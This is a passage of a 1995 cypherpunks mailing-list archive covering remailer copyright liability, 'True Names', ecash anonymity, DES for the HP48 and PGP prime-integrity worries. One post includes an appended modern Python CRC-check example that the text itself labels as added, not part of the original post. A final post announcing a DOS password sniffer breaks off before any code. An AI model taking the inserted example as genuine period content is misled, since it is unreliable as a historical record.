normally read anything more sci-fi than certain software manuals. :)
Strongly recommended for c-punks who can last 600 pages (after the first
ten, you're hopelessly hooked if you have half a brain left after reading
this list for a year or two).

I _WISH_ I had VV's email address! I'd like to send the guy a big thank-you
and ask if he's writing a sequel (yet). If anyone does know it, puh-LEEze
mail me. First book of his I've read, first of its kind I've enjoyed in a
very long time. I'll scan my favorite crypto-related (legal-length) excerpt
and post it next week, howzat?

  dave
_________________________
 Big books small
 Books high books tall
 Just give me a good
 Little book,
 That's all.

     -Truman Capote (age 11)



C-LIT = Cypherpunk LITerature. Gitcher mind outta the gutter there, Lancelot.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Godwin <mnemonic@eff.org>
Date: Thu, 5 Jan 95 13:27:04 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Warning letter from Co$. [any comments ?]
In-Reply-To: <199501050801.AAA18013@largo.remailer.net>
Message-ID: <199501052127.QAA09356@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


 
Actually, civil copyright infringement liability doesn't turn on
knowledge. You can be an infringer even if you don't know.

Criminal copyright infringement requires a guilty mental state, so *that*
you have to know.


>    From: Avi Harris Baumstein <avi@clas.ufl.edu>
> 
>    i know there has been much chatter on this subject, but are there
>    truly any precedents that could hold on the anonymous distribution of
>    copyrighted material?
> 
> Cubby v. Compuserve is relevant here, as well as that bookstore case
> in the 50's that I never remember the name of.  Mike G., can you help
> me out on this one?
> 
> These cases are about other kinds of wrongs (libel in one and
> obscenity (?) in the other), but copyright violation doesn't seem to
> have any particular features to set it apart from the basic
> principle of these.  Namely, if you know, you're responsible; if you
> don't, you're not.  This, you all realize no doubt, is a gross
> simplification of a long chain of reasoning.
> 
>    what
>    exactly constitutes a trade secret, and what sort of laws apply?
> 
> The short answer is that if you didn't sign a trade secret agreement
> or are party to one by some other relationship (such as agency), then
> a trade secret that comes your way is no secret any more.
> 
>    >    clients'  property   rights.    Courts   are   holding   such
>    >    contributory  infringers  liable.   Two  examples  are:  Sega
>    >    Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
>    >    Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
>    >    1152 (M.D.  Fla.  1993).
> 
>    what of these cases? is this just an example of typical lawyerly
>    intimidation tactics? 
> 
> I have personal experience with the first case.  It was a local BBS
> run by a friend of a friend, and I got involved a year ago right after
> the seizure.  (It was, BTW, a _civil_ seizure of a BBS, not criminal.)
> I believe the case settled out of court.  There were court documents
> approving the seizure however; I don't know if these set precedent or
> not.  I suspect not, because the action was entirely _ex parte_ (Latin
> for one-sided).  Mike, again?  Other legal folk?
> 
> I know nothing about the second one.
> 
>    how do you remailer-ops plan to react? my first
>    instinct (were i running a remailer) would be to ignore it, on grounds
>    that i wouldn't examine any mail passing through. 
> 
> The people who keep logs, yes, are in more danger than those who don't.
> 
> Eric
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Angus Patterson <s675570@aix1.uottawa.ca>
Date: Thu, 5 Jan 95 13:45:27 PST
To: cypherpunks@toad.com
Subject: True Names
Message-ID: <Pine.3.89.9501051627.A53015-0100000@aix1.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


I've been trying to get True Names by Vernor Vinge, and have been told it's
out of print (like most good cypunk ), does anybody have it scanned? 
I realize this is without permission, so does anybody have Vinge's address?
(e-mail or otherwise) or could anybody ask him? Btw, does he have any other
crypto/anonymity related stories? Thanks in advance.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 5 Jan 95 17:07:10 PST
To: cypherpunks@toad.com
Subject: Re: True Names
In-Reply-To: <9501060048.AA11061@netmail2.microsoft.com>
Message-ID: <199501060107.RAA18958@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Blanc Weber <blancw@microsoft.com> writes:

> I see copies in used bookstores often. It's in the collection "True
> Names and Something-or-other" and was in print until recently. I also

"True Names and Other Dangers" -- I think it's a Baen edition.

> have the Bluejay edition, with an afterword by Marvin Minsky.

Me too, and I also have the first published version, which is in
"Binary Star #5" with "Nightflyers" by George R. R. Martin.

Great book -- I want to be a cybergod when I grow up.

	Jim Gillogly
	15 Afteryule S.R. 1995, 01:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael  Conlen <meconlen@IntNet.net>
Date: Thu, 5 Jan 95 14:44:10 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SV4.3.91.950104192503.17118H-100000@xcalibur>
Message-ID: <Pine.SV4.3.91.950105171747.13888A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 4 Jan 1995, Jonathan Cooper wrote:

> > is how can they regulate what private business and citizens do with 
> > their Fiber Optics, ISDN lines, telephone lines, and computers. If the
> 
>    They already do - look at the regulations on telcos, power companies, 
> water companies, cellular/paging companies, lawyers, doctors, etc. 

A big difference between the 'net and some of the above, is that the net 
has been around in a very large presence (internationally) before the laws 
are being introduced, whereas paging and cellular service didn't exist. 
As far as lawyers and doctors and lawyers, one of the big things the 
government does is protect against quacks. Not too many people are going to 
argue with this. The government wants to protect us from speech in the 
case of the 'net, well there are quite a few people who are going to 
stand up for their first amendment rights. 

If you want your own communication service, you can buy it. Whether you 
use fiber based WAN's or go straight for satellite service, used by 
companies such as Holiday Inn, or Circuit City. You can exchange any 
information you want. 

I think the important thing to remember is that net access is not a 
right. My service provider has the right to give service to whom they 
please, as long as race, sex, or creed are not deciding factors. 

What goes across .gov and .mil computers is one thing, however what 
comes across sprintlink's computers to my service provider to my 
computer is up to sprintlink, Intnet.net and myself. I don't care to read 
racist comments, so I don't view them. If I want to download nudie gifs, 
it's my business, and right as stated under the First Amendment.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Jan 95 14:40:11 PST
To: John Young <cypherpunks@toad.com
Subject: GIF_nip
Message-ID: <v01510101ab32255ff5ee@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Thu, 5 Jan 95 17:50:45 PST
To: jim@acm.org
Subject: Re: True Names
Message-ID: <9501060151.AA16068@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Jim Gillogly

> Blanc Weber <blancw@microsoft.com> writes:

> I see copies in used bookstores often. It's in the collection "True
> Names and Something-or-other" and was in print until recently. I also
.............................................................

No, No, Jim, that wasn't me saying that  -  that statement was made by 
a cpunkgod.
Mine was beneath it.

Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 5 Jan 95 15:30:21 PST
To: cypherpunks@toad.com
Subject: Anonymity in Donating
Message-ID: <199501052335.SAA16921@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Some nice examples of the preservation of anonymity in charitable donations, 
both for the donor and for the recipient, caught my attention today.

An article by Clare Ulrich in the December 1994 Communique (Vol.18 No.3), 
published by The Cornell Campaign, pays tribute to an anonymous donor
to Cornell U.:
"While some acts of generosity are marked by a name on a building or a plaque
on a wall, others, so to speak, can be counted among the philanthropic 
`whodunits.' These are the anonymous gifts, and Communique would like to 
profile several innovative projects that one anonymous donor helped launch
this year. According to the donor, anonymity provides greater freedom to `pick
and choose' projects that are personally interesting. This donor is 
particularly attracted to programs that involve computer technology or promise
to generate benefits beyond the scope of the immediate project. [...] The
same donor who declined recognition for these high-tech projects also provided
support for 24 high school juniors from Boys Harbor in Harlem to attend the
six-week Cornell Summer College Program in 1994, as well as the two previous
summers. [...] Although this anonymous donor may not be interested in getting
a name on something, he certainly leaves an indelible mark on the quality of
education at Cornell."

Closer to home, our dept. chair Dave Stemple broadcast a request for donations
to an anonymous recipient:
"One of our undergrad majors lived in Amherst Crossings, which burned down
last week. As a result this student, a senior who had planned to graduate this
spring, is destitute and needs help or he will be unable to complete his
degree. If you would like, you can contribute clothes or money (cash only
please in order to maintain the student's anonymity) to him. [...]"

Incidentally, I received my B&W C'punks shirt from Kevin Prigge a few weeks
ago, and consider myself a very satisfied customer. I made a point of wearing
it on the flights both ways for a recent vacation I took in California. On the
return trip, I was delayed at O'Hare for over an hour due to a leaky window
on the airplane. A man in his 50s or 60s approached me and asked, with a smirk,
what a Cypherpunk was. I explained a bit, mentioning the passage of the DT
bill. Noting the mention of the NSA on the shirt, the man mentioned that his
son is working at Apple "with the NSA"....

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwyA6mf7YYibNzjpAQFENAQA09JTWr501ZJliFWK4efY8py2OhgBq8gy
rqYvrGX+EZ49Uq+IDU2DjiiPBHuYPOE23wb/QfouhmKaSSUMqifYTd+uau247Cot
CC+CYceBvH3oK35oTr7CahSqb4JLUNs4atOkoYtpbYPG5qrR8yJkAGBKbVzQZHKt
ioUFB5xhYKA=
=QD4b
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwyB+CoZzwIn1bdtAQEgkAF+OBkRShMO+Et/Kr8AkPXPz564xgNnhzfP
WPSO0W0UCpkg/e7bQIliMCXiyzp7nHQr
=1IBd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Thu, 5 Jan 95 18:56:29 PST
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: floating point crypto?
In-Reply-To: <v01510100ab3251fa70de@[199.0.65.105]>
Message-ID: <199501060251.SAA26936@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert H. has asked that we reply in e-mail to him, to avoid
"cluttering the list more than I already have...," but the logic of
this is faulty. The few lines of a response such as this one, or even
of several such responses, are as nothing compared to dozens or more
people sifting their own archives so they can each independently send
Robert what they find. Hence my public reply.

Robert Hettinga wrote:

> I casually mentioned somewhere else that I saw something on this list about
> floating-point math being used in crypto, contrary to popular belief, and
> somebody had the *temerity* to call me on it. ;-).
> 
> I think it had to do with factoring, but maybe even in key-generation,
> though that doesn't sound right at all...

The thread was "Pentium bug and CRYPTO," and it hit on 1994-11-21 and
lasted a few days. Posts by Derek Atkins, Mike Duvos, and others
stated persuasively that no floating point operations are included in
PGP, that no FP coprocessor is needed or used for PGP, and that the
Pentium bug could not affect PGP.

(In another thread, which I have no intention of trying to dig up now,
though I recall either Norm Hardy or Hal Finney was one of those to
comment, it was noted that some clever uses of floating point hardware
can help with ostensibly integer-only computations. But PGP, as noted
above, does not do this, and I expect this trick is not common.)

> So, are there c-punk archives I could look in? I remember hearing something
> about that, too.
> 
> However, if someone remembers off the top of their head, or if they have an
> actual copy of the posting, that would be great, too.
> 
> Please send me whatever it is by e-mail. No point cluttering the list more
> than I already have...

(I will send Robert several of these articles, so others don't have to.
Game theory and all that good stuff.)

> 
> Of all the nerve....

Not to sound strident, but if folks would keep copies of articles and
spend some time organizing them in data bases or in other searchable
forms, this would help the list. In my opinion, having personal access
to past posts is several orders of magnitude more important than
having MIDI-MIME JPEG-II TeX players that can display "Cypherpunks R
Us" in the correct font and with the "R" reversed according to spec.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Thu, 5 Jan 95 16:27:02 PST
To: cypherpunks@toad.com
Subject: Re: ecash trial issues explained
Message-ID: <9501060025.AA06458@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
> 
> >-> Digital cash should not be "anonymous" -- paper currency isn't.  Serial
> 
> There seems to be a misconception here what is meant with anonymous. Paper cash  
> is anonymous: I can't derive the person I got the note from from the note  
> itself. So if I meet a guy in the street, he gives me a pack of cigarettes and  
> I give him cash, this transaction is anonymous. 

It isn't difficult to make paper cash less anonymous, though, by tracking serial
numbers.  This is occasionally done in "law enforcement" situations - recording
the notes used to pay ransom or bribes.  It wouldn't be difficult to add 
serial-number recording equipment/mechanisms to automatic bank-teller machines, 
to record what serial numbers would be given out to whom.  
(This can be done either by adding scanners to the ATMs themselves, 
or by scanning the money before putting it into the ATM, and having the ATM record
that transaction #43 dispensed the 105th-110th bills in the stack.
Scanning can either be done by OCRs, or by replacing the human-readable
numbers with bar-codes, as some of the paranoids periodically suggest the
US Treasury is about to do as part of some heinous plan.)

However, the original poster's assertion that digital cash should not be 
anonymous is not a technical statement, it's a value judgement, and in 
my opinion it's a bad one.  There are a lot of genuine social needs that
anonymity can support, and a lot of bad things that can be done with 
traceable money.  Aside from that, traceability costs money.  Original gold
and silver money didn't need to be traceable, though coiner's and assayer's marks
were useful, and it is easier to keep track of your pile of gold bars if they're
numbered.   But paper money has serial numbers largely to prevent easy copying;
gold is a lot harder to counterfeit, unless you've got a king who insists that
coins with his face on them should be worth N times as much as anonymous coins.

Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 5 Jan 95 16:27:39 PST
To: cypherpunks@toad.com
Subject: Re: Remailer postage
In-Reply-To: <199501052148.NAA07203@netcom5.netcom.com>
Message-ID: <m0rQ2ax-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: tcmay@netcom.com (Timothy C. May)
   Date: Thu, 5 Jan 1995 13:48:34 -0800 (PST)

   (I understand that Russ Nelson has experience in the shareware
   business, so he may know how many people send in their voluntary
   contributions. My understanding is that it's a tiny fraction, and that
   few shareware authors ever make much money. I've talked to some of
   them, and they consider shareware a failed experiment, except for new
   products trying to break into crowded markets, where the "shareware"
   label is just a facade for essentially giving it away in exchange for
   fame and eventual fortune if the product goes commercial.)

Shareware is essentially begging, yes.  Far better to just give the
software away to create a need for your services.  Then people are
actually getting something for their money.

Selling services is profitable, particularly if you can sell the same
service to multiple people at the same time.  If you're very good at
selling, you can even sell a service as an insurance plan.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Jan 95 16:32:59 PST
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: GIF_nip
Message-ID: <v01510102ab323c906927@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>        Watch your Cc: headers, s'vous plait?

AAK! Eudora's "reply-to-all" strikes again!

Grovelling in your general direction,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Thu, 5 Jan 95 16:58:57 PST
To: Doug Barnes <db@Tadpole.COM>
Subject: Re: Remailer Abuse
In-Reply-To: <9501050453.AA10198@tadpole.tadpole.com>
Message-ID: <Pine.SV4.3.91.950105194814.15256A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Anonymous remailers pretty much require anonymous digital cash,
> although this could be built on top of some other electronic
> payment system with somewhat less payment lag and reversibility 
> than FV.

   Perhaps if the people at DigiCash had seen fit to give me the beta 
client and server software I could attempt to implement such a beast.  
Unfortunately, I don't meet their criteria.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Thu, 5 Jan 95 17:02:26 PST
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: your mail
In-Reply-To: <v01510100ab319028d7be@[199.0.65.105]>
Message-ID: <Pine.SV4.3.91.950105195203.15256B-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> >* Hackers have successfully compromised 350 DoD computer systems

   If the DoD includes the various branches of service {Army, Navy, etc.} 
that number is grossly inaccurate.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Thu, 5 Jan 95 17:22:42 PST
To: cypherpunks@toad.com
Subject: Re: True Names
In-Reply-To: <9501060048.AA11061@netmail2.microsoft.com>
Message-ID: <Pine.SUN.3.91.950105202221.17607B-100000@unix1.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

> I see copies in used bookstores often. It's in the collection "True
> Names and Something-or-other" and was in print until recently.

	"True Names and Other Dangers", if anyone's trying to mail order it.

--Mike, still looking for a copy himself




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Thu, 5 Jan 95 17:40:39 PST
To: cypherpunks@toad.com
Subject: DES for HP48
Message-ID: <95Jan5.204113edt.4634@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


There used to be some code on soda to do DES on an HP48 palmtop/calculator.
I looked this afternoon, on ftp.csua.berkeley.edu, and I couldn't find it.
Anyone know where it got to?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 5 Jan 95 20:43:54 PST
To: cypherpunks@toad.com
Subject: Re: DES for HP48
In-Reply-To: <95Jan5.204113edt.4634@cannon.ecf.toronto.edu>
Message-ID: <199501060443.UAA19367@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>

   There used to be some code on soda to do DES on an HP48 palmtop/calculator.

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/applications/misc/des.hp48sx.gz

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Fri, 6 Jan 95 06:06:39 PST
To: cypher@dxm.ernet.in
Subject: Re: PATNEWS:  PTO accepting USENET FAQs are formal prior art
In-Reply-To: <199501040304.AA01233@world.std.com>
Message-ID: <B0ZLZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Thought I'd pass this on...
-Rishab

srctran@world.std.com (Gregory Aharonian) writes:

> !010394  PTO accepting USENET FAQs as formal prior art
> 
>      It seems that the US Patent Office is accepting Internet USENET FAQs
> (Frequently Asked Questions - periodic postings on USENET groups with
> questions and answers) as prior art.  As you see in the following entry
> from my software prior art database, one of the Other References is to
> a cryptography FAQ.  If anyone knows if the European Patent Office is accepting
> USENET FAQs, and has an example, let me know.
> 
>      Thus if an examiner objects to your use of a FAQ as prior art, cite
> this patent (NTIPAFCAP*).  It probably would be helpful if the PTO came out
> with a quick guideline to a consistent way of doing so.  I suppose archiving
> FAQs is one more thing I can add to my databases.
> 
>      It's nice to see the PTO embracing part of the Internet, even as it
> rejects other parts of the Internet.  Eventually, though, the PTO will have
> to choose one or the other.
> 
> Greg Aharonian
> Internet Patent News Service
> (for subscription info, send 'help' to   patents@world.std.com )
> (for prior art search services info, send 'prior' to patents@world.std.com )
> (for WWW patent searching, try  http://sunsite.unc.edu/patents/intropat.html )
>                               ====================
> 
> TYP[USPAT]
> NUM[5371794]
> ASS[Sun Microsystems]
> CUN[USX]
> ISD[19941206]
> CLS[380/21]
> ART[222]
> LOC[]
> GRG[]
> TIT[Method and apparatus for privacy and authentication in wireless networks]
> ORF[5]
> ORFTXT[
> Authentication and Authenticated Key Exchanges, Authors: Diffie, Oorschot &
>   Weiner, Published by Designs, Codes & Cryptography 2, 107-125,
>   .COPYRGT.1992 Kluwer Academic Publishers.
> The First Ten Years Of Public Key Cryptography, Author: Whitfield Diffie,
>   Reprinted from Proceedings of the IEEE, vol. 76, No. 5, May 1988.
> 
> Overview of Cryptology: Summary Of Internet Cryptology Frequently Asked
>   Questions (Oct. 1992).
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> 
> The Keys To Privacy and Authentication, Publication by RSA Data Security,
>   Inc., 100 Marine Parkway, Redwood City, Calif. 94065. (Oct. 1993).
> Answers To Frequently Asked Questions About Today's Cryptography, Author:
>   Paul Fahn, RSA Laboratories, 100 Marine Parkway, Redwood City, Calif. 94065
>   (Sep. 1992).
> ]
> 
> 
> =============================================================================
> 
> (NTIPAFCAP*  =  Not that issued patents are formally citable as precedent).


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Jan 95 18:01:33 PST
To: cypherpunks@toad.com
Subject: floating point crypto?
Message-ID: <v01510100ab3251fa70de@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I'm incensed.

I casually mentioned somewhere else that I saw something on this list about
floating-point math being used in crypto, contrary to popular belief, and
somebody had the *temerity* to call me on it. ;-).

I think it had to do with factoring, but maybe even in key-generation,
though that doesn't sound right at all...

So, are there c-punk archives I could look in? I remember hearing something
about that, too.

However, if someone remembers off the top of their head, or if they have an
actual copy of the posting, that would be great, too.

Please send me whatever it is by e-mail. No point cluttering the list more
than I already have...

Of all the nerve....

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 5 Jan 95 12:56:32 PST
To: cypherpunks@toad.com
Subject: Re: Are 2048-bit pgp keys really secure ?
Message-ID: <9501052056.AA24402@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> A somewhat disturbing trend has appeared in the low-end cost-sensitive PC
> SIMM market.  Some supposedly 9-bit SIMMs are actually 8-bit SIMMs plus
> a parity generator.  This means that the parity checking is essentially
> subverted, because the parity bit is generated from the stored contents
> of memory at read time, rather than the stored contents when it was
> written to.  As such, NO bit errors are detected.

So why not do a cheap trick:

After the small primes check calculate a CRC checksum over the number.
Then do the primality check. If it is a prime, store it together with
the CRC. The CRC can be checked for every use of the number.

(PGP encrypts the secret key and therefore it generates a CRC for the
encrypted packet. But this CRC is generated after the primality check.)


We already had some SIMM modules with bit errors. They were detected by
a parity check. If cheap pc simms don't have a real parity bit, the probability
of having such a bug isn't as low as 10^-40. If cheap parity-less simms
are available they get sold (cheap and expensive). 


Hadmut

BTW: Some weeks ago they found motherboards with falsified cache rams:
They had just the normal DIL-ICs and the normal pins, but the plastic of
the ICs didn't contain a chip. The BIOS was modified to give out a message
about a good cache ram check at boot time.
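
The scheme proposed in the message above, written out as an added Python example (it is not part of the original post and not PGP's code): the CRC is taken after the small-primes check and before the primality test, stored with the prime, and rechecked on every use. CRC-32 from zlib, Miller-Rabin as the primality test, all function names, and the simulated single-bit memory error are assumptions of this sketch.

```python
import secrets
import zlib


class IntegrityError(Exception):
    """Stored number no longer matches the CRC taken before primality testing."""


def small_primes(limit=2000):
    # Sieve of Eratosthenes; these primes drive the cheap "small primes check".
    sieve = bytearray([1]) * limit
    sieve[0:2] = b"\x00\x00"
    for i in range(2, int(limit ** 0.5) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytearray(len(range(i * i, limit, i)))
    return [i for i, flag in enumerate(sieve) if flag]


SMALL_PRIMES = small_primes()


def crc_of(n):
    # CRC-32 over the big-endian bytes of n.
    return zlib.crc32(n.to_bytes((n.bit_length() + 7) // 8, "big"))


def is_probable_prime(n, rounds=40):
    # Trial division followed by Miller-Rabin with random bases.
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n == p:
            return True
        if n % p == 0:
            return False
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        a = 2 + secrets.randbelow(n - 3)  # base in [2, n-2]
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a is a witness: n is composite
    return True


def check_prime(p, tag):
    # Call before every use of the stored prime.
    if crc_of(p) != tag:
        raise IntegrityError("prime changed since it was tested")
    return p


def generate_checked_prime(bits=256):
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if any(candidate % p == 0 for p in SMALL_PRIMES):
            continue  # failed the small primes check
        tag = crc_of(candidate)  # CRC taken BEFORE the primality test
        if not is_probable_prime(candidate):
            continue
        # The value that was tested must still be the value that is stored.
        return check_prime(candidate, tag), tag


def demo():
    p, tag = generate_checked_prime(256)
    corrupted = p ^ (1 << 17)  # constructed fault: one flipped bit
    try:
        check_prime(corrupted, tag)
        early_tag_detects = False
    except IntegrityError:
        early_tag_detects = True
    # A CRC computed only after the fault vouches for the wrong number,
    # which is the objection raised to a CRC generated after the check.
    late_tag_detects = crc_of(corrupted) != crc_of(corrupted)
    return early_tag_detects, late_tag_detects


if __name__ == "__main__":
    print(demo())
```

CRC-32 catches every single-bit error in a value of unchanged length, so the flipped bit in `demo()` is always detected by the early tag and never by the late one.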




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@vortex.mm.com>
Date: Thu, 5 Jan 1995 21:57:05 -0600
To: carolann@vortex.mm.com
Subject: No Subject
Message-ID: <82e47b32bd189967ee9a205e1d1602de@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


[icicle.winternet.com] 
Login name: carolann  			In real life: CarolAnne Braddock
Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
New mail received Thu Jan  5 21:16:23 1995;
  unread since Mon Jan  2 13:18:25 1995
Plan:
This account has been disabled permanently.

Mike Horwath - Admin - Winternet - drechsau@winternet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Thu, 5 Jan 95 22:54:18 PST
To: "Timothy C. May" <tcmay@netcom.com>
Subject: Re: Book review: Codebreakers, the Inside Story of Bletchley Park
In-Reply-To: <199501040551.VAA12193@netcom13.netcom.com>
Message-ID: <Pine.3.89.9501060058.B6821-0100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain


Another book that has not been mentioned is "Alan Turing the Enigma" by
Andrew Hodges.  It gives, what I think, is a good analysis of Turing's
work, a lot of which is still classified, what role Hut 6 played (theater 
traffic analysis, bombe development, and other projects after Hut 6) , and 
his subsequent role in the development of computing.

Hodges does a good job of putting Turing in historical and 
mathematical/cryptological perspective.

Alas, like some of the books that are suggested, it is recently out of 
print ( look for it in the remainder/used book stores).


Dan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Thu, 5 Jan 95 22:58:49 PST
To: cypherpunks@toad.com
Subject: sniff passwords on PC (DOS)
Message-ID: <0098A089.4C425900.550@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain


As a demonstration of concept, I wrote a small, simple program that
